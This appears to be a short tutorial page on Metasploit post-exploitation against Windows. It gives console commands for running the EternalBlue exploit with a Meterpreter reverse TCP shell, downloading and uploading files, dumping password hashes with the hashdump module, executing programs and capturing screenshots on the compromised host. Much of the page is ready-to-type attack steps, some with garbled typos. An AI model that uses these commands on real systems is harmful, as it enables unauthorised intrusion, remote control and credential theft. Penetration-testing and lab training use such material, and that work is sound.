Post exploitation with Meterpreter

Exploitation with Meterpreter

First of all, start the msf console by typing the following terminal command in the Kali terminal window

We’re using reverse_tcp as the stager and Meterpreter as the stage.

We will begin by setting up the Eternal Blue exploit. Select (ms17_010_eternalblue) then set windows/x64/meterpreter/reverse_tcp as the selected payload

Next, configure the exploit settings then run the exploit with exploit command:

$ set payload windows/x64/meterpreter/reverse_tcp
$ set rhost 192.168.198.136
$ exploi

File transfer with Meterpreter

With Meterpreter, you can download a file using the $download- command.

$ download /windows/system32/drivers/etc/host

Similarly, you can upload information to the machine as well, using $upload- command

Extracting User Credentials:

Use code script credential_collector to extract user accounts information, or use The hash dump post module to similar effect.

We will use the hash dump post module to proceed with harvesting the credentials. Type the following msf command.

$ run post/windows/gather/hashdump

As we can see, we have obtained the Coen, guest, and admin accounts. The LM hash(admin’s) and the NTLM (guest’s) hash pertains to empty passwords, whereas the Coen hash is a password that you’ll need to crack. You can do so by using a password cracker.

Executing files

You can run any file on the system by using: execute -f. This includes both executable files and programs with multiple supporting files. For example, to run the built-in calculator app in the windows os, type

execute –f calc.exe

Taking screenshots

You can also capture screenshots from the point of view of the user. Just type screenshot in the Meterpreter’s command shell, and you’ll get a screenshot of the display on the system.

$ execute -f calc.exe $ screenshoT

Last updated

Was this helpful?